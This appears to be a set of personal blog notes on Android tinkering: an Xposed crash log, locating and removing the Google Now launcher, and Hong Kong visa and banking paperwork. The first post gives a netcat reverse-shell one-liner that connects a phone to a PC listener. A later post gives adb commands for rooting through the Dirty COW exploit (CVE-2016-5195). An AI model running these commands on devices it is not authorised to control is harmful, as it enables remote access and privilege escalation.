Get Android shell through wifi or internet, get Android shell without adb

basically, this is reverse shell

install terminal via google play on device

 

no need to be in the same WiFi LAN, phone can connect to PC is enough

do below on phone

cd /data/data/jackpal.androidterm
mkfifo f
cat f | /system/bin/sh -i 2>&1 | nc PC_IP 4444 > f

do below on PC

nc -l 192.168.30.235 4444

then you can have a reverse shell and control the phone by your PC even you cannot enable adb

and can even get root permission by CVE such as CVE-2016-5195

device hang after Xposed

某台機器上面加上 Xposd 之後就隨機 device hang

從 logcat 可以看到這些錯誤訊息

但還不知道是怎麼引起的

目前 work around 是把 /data/dalvik-cache 保留下來

907 [ 117.924270] init: Service 'zygote' (pid 621) killed by signal 9
20161123_17:37:35.logcat
3834 01-01 12:46:19.877 1265 1816 E Watchdog: Triggering SysRq for system_server watchdog
3835 01-01 12:46:19.878 1265 1816 W Watchdog: *** WATCHDOG KILLING SYSTEM PROCESS: Blocked in handler on main thread (main)
3836 01-01 12:46:19.878 1265 1816 W Watchdog: main thread stack trace:
3837 01-01 12:46:19.878 1265 1816 W Watchdog: at dalvik.system.DexFile.openDexFileNative(Native Method)
3838 01-01 12:46:19.878 1265 1816 W Watchdog: at dalvik.system.DexFile.openDexFile(DexFile.java:295)
3839 01-01 12:46:19.878 1265 1816 W Watchdog: at dalvik.system.DexFile.<init>(DexFile.java:80)
3840 01-01 12:46:19.878 1265 1816 W Watchdog: at dalvik.system.DexFile.<init>(DexFile.java:59)
3841 01-01 12:46:19.878 1265 1816 W Watchdog: at dalvik.system.DexPathList.loadDexFile(DexPathList.java:279)
3842 01-01 12:46:19.878 1265 1816 W Watchdog: at dalvik.system.DexPathList.makePathElements(DexPathList.java:248)
3843 01-01 12:46:19.878 1265 1816 W Watchdog: at dalvik.system.DexPathList.<init>(DexPathList.java:120)
3844 01-01 12:46:19.878 1265 1816 W Watchdog: at dalvik.system.BaseDexClassLoader.<init>(BaseDexClassLoader.java:48)
3845 01-01 12:46:19.878 1265 1816 W Watchdog: at dalvik.system.PathClassLoader.<init>(PathClassLoader.java:65)
3846 01-01 12:46:19.879 1265 1816 W Watchdog: at android.app.ApplicationLoaders.getClassLoader(ApplicationLoaders.java:57)
3847 01-01 12:46:19.879 1265 1816 W Watchdog: at android.app.LoadedApk.getClassLoader(LoadedApk.java:383)
3848 01-01 12:46:19.879 1265 1816 W Watchdog: at de.robv.android.xposed.XposedInit$4.afterHookedMethod(XposedInit.java:169)
3849 01-01 12:46:19.879 1265 1816 W Watchdog: at de.robv.android.xposed.XposedBridge.handleHookedMethod(XposedBridge.java:348)
3850 01-01 12:46:19.879 1265 1816 W Watchdog: at android.app.LoadedApk.<init>(<Xposed>)
3851 01-01 12:46:19.879 1265 1816 W Watchdog: at android.app.ActivityThread.getPackageInfo(ActivityThread.java:1927)
3852 01-01 12:46:19.879 1265 1816 W Watchdog: at android.app.ActivityThread.getPackageInfoNoCheck(ActivityThread.java:1889)
3853 01-01 12:46:19.879 1265 1816 W Watchdog: at android.app.ActivityThread.handleReceiver(ActivityThread.java:2813)
3854 01-01 12:46:19.879 1265 1816 W Watchdog: at android.app.ActivityThread.access$2000(ActivityThread.java:173)
3855 01-01 12:46:19.879 1265 1816 W Watchdog: at android.app.ActivityThread$H.handleMessage(ActivityThread.java:1513)
3856 01-01 12:46:19.879 1265 1816 W Watchdog: at android.os.Handler.dispatchMessage(Handler.java:102)
3857 01-01 12:46:19.879 1265 1816 W Watchdog: at android.os.Looper.loop(Looper.java:148)
3858 01-01 12:46:19.879 1265 1816 W Watchdog: at com.android.server.SystemServer.run(SystemServer.java:411)
3859 01-01 12:46:19.879 1265 1816 W Watchdog: at com.android.server.SystemServer.main(SystemServer.java:210)
3860 01-01 12:46:19.879 1265 1816 W Watchdog: at java.lang.reflect.Method.invoke(Native Method)
3861 01-01 12:46:19.879 1265 1816 W Watchdog: at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:727)
3862 01-01 12:46:19.879 1265 1816 W Watchdog: at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:617)
3863 01-01 12:46:19.879 1265 1816 W Watchdog: at de.robv.android.xposed.XposedBridge.main(XposedBridge.java:102)
3864 01-01 12:46:19.880 1265 1816 W Watchdog: *** GOODBYE!
3865 01-01 12:46:19.909 621 621 E Zygote : Exit zygote because system server (1265) has terminated

 

台灣人在香港工作簽證、銀行帳戶 2016年

去年之前開設香港銀行帳戶都還是比較簡單的,不需要具備太多理由

我到香港之後開始試著去匯豐銀行開戶

先上網找了開戶條件,條件很多,也不知道哪些是必要哪些非必要

https://www.personal.hsbc.com.hk/1/content/hongkongpws/chinese/pdf/applyaccount_note.pdf

總之我去了四趟銀行都失敗,我超有耐心的啦

最終需要的東西有

台灣護照

公司僱用合約,含負責人簽名,我是給CTO簽的,必須是正本,銀行不會收走,只是需要看一下

地址證明,通常會是信用卡/水電煤氣帳單,但我不太可能有這種東西,銀行說可以請公司印一份地址證明給我

工作簽證

工作簽證入境的證明,也就是會貼在護照上面的一張紙,要用這個工作簽證入境的意思

因為我這次進來不是用工作簽證進來的,所以護照上面沒有這個東西,等我拿到這個道具,成功開戶,再上來更新一次

另外

從公司幫我送件給移民局到我拿到工作入境許可證時間耗時約一個月,其中包括因為缺了戶籍謄本而多等了一週的時間

另外2

https://bankhk.wordpress.com/2014/06/25/%E9%A6%99%E6%B8%AF%E9%8A%80%E8%A1%8C%E6%88%B6%E5%8F%A3%E5%A5%BD%E8%99%95-2/

這個開帳戶服務我也打電話問過,要存款超過三百萬台幣才會幫忙辦理…

另外3

我是用這個身份來香港工作的

http://www.immd.gov.hk/hkt/forms/forms/id990a.html

還有一份指南給這個身份的人閱讀,必讀!主要閱讀延長逗留期限、逗留條件

http://www.immd.gov.hk/pdforms/ID(C)991.pdf

另外4

http://www.investhk.gov.hk/zh-hk/setting-up-your-business/hong-kong-immigration-and-visa-requirements.html

這個頁面說

====================================

法例規定,年滿11歲的香港居民必須隨身攜帶身份證。

獲准在港逗留超過180天的人士、包括以就業或投資身分持簽證赴港者,必須在抵港後30日內向入境事務處申領香港身份證。申請手續簡便,費用全免。

====================================

所以必須申請智能身份證,以後也方便走E通道入關

除了身份證之外,我也打算申請換發多次入境許可了

否則用單次的進來之後,回台灣再度過來香港就要改用觀光簽

多次入境許可證申請 http://www.immd.gov.hk/hkt/forms/forms/id931.html

18 歲以上人士申請身份證 http://www.immd.gov.hk/hkt/services/hkid/reg_replace.html#above_18&secondTab

2017/1/2 使用身份證走 e 道入境香港,連多次入境卡都不必出示了,整體入境感覺就彷彿你是個香港人似的

申請身份證的時候會壓指紋跟拍照,有身份證就可以走 e 道通關,不必額外申請。

remove google now launcher

I search google now launcher in system partition for almost 6 hours and find nothing

and that is impossible that google now launcher exist but no such apk

finally, I think of the data partition!

and then find /data/data/com.google.android.googlequicksearchbox/

but there is no apk in that folder

so I look into the /proc/(pidof googlequicksearchbox)

then found things below

1|root@device:/data/data # ls -l /proc/24823/fd/
lrwx------ u0_a59 u0_a59 2016-01-04 05:24 0 -> /dev/null
lrwx------ u0_a59 u0_a59 2016-01-04 05:24 1 -> /dev/null
lr-x------ u0_a59 u0_a59 2016-01-04 05:24 10 -> /dev/urandom
lrwx------ u0_a59 u0_a59 2016-01-04 05:24 11 -> /dev/binder
lr-x------ u0_a59 u0_a59 2016-01-04 05:24 12 -> /dev/ion
lrwx------ u0_a59 u0_a59 2016-01-04 05:24 13 -> anon_inode:[eventfd]
l-wx------ u0_a59 u0_a59 2016-01-04 05:24 14 -> /dev/cpuctl/tasks
l-wx------ u0_a59 u0_a59 2016-01-04 05:24 15 -> /dev/cpuctl/bg_non_interactive/tasks
lrwx------ u0_a59 u0_a59 2016-01-04 05:24 16 -> socket:[258179]
lr-x------ u0_a59 u0_a59 2016-01-04 05:24 17 -> pipe:[258180]
l-wx------ u0_a59 u0_a59 2016-01-04 05:24 18 -> pipe:[258180]
lrwx------ u0_a59 u0_a59 2016-01-04 05:24 19 -> anon_inode:[eventpoll]
lrwx------ u0_a59 u0_a59 2016-01-04 05:24 2 -> /dev/null
lr-x------ u0_a59 u0_a59 2016-01-04 05:24 20 -> /system/priv-app/Velvet/Velvet.apk
lrwx------ u0_a59 u0_a59 2016-01-04 05:24 21 -> /data/data/com.google.android.googlequicksearchbox/databases/launcher.db

Velvet.apk is the GoogleNowLauncher apk, just remove it!

get root permission by CVE2016-5195 dirtycow, on Android

using this CVE to get root permission on Android

https://github.com/timwr/CVE-2016-5195

https://github.com/timwr/CVE-2016-5195/blob/master/Makefile

https://github.com/timwr/CVE-2016-5195/blob/master/Makefile
$ adb shell 'chmod 777 /data/local/tmp/run-as'
$ adb shell '/data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as'
$ adb shell /system/bin/run-as

In brief, dirtycow can write data to the file which is originally normal user cannot write to.

so that you can change the content of a file (a binary file, e.g.: /system/fsck_exfat)

every time fsck_exfat was triggered, your code will be executed with root permission, because fsck_exfat originallt run with root permission and sepolicy allow this file to read/write block device, so that you can read/write any block device on the system!

REF:
http://forum.xda-developers.com/showpost.php?p=69381350&postcount=192

https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs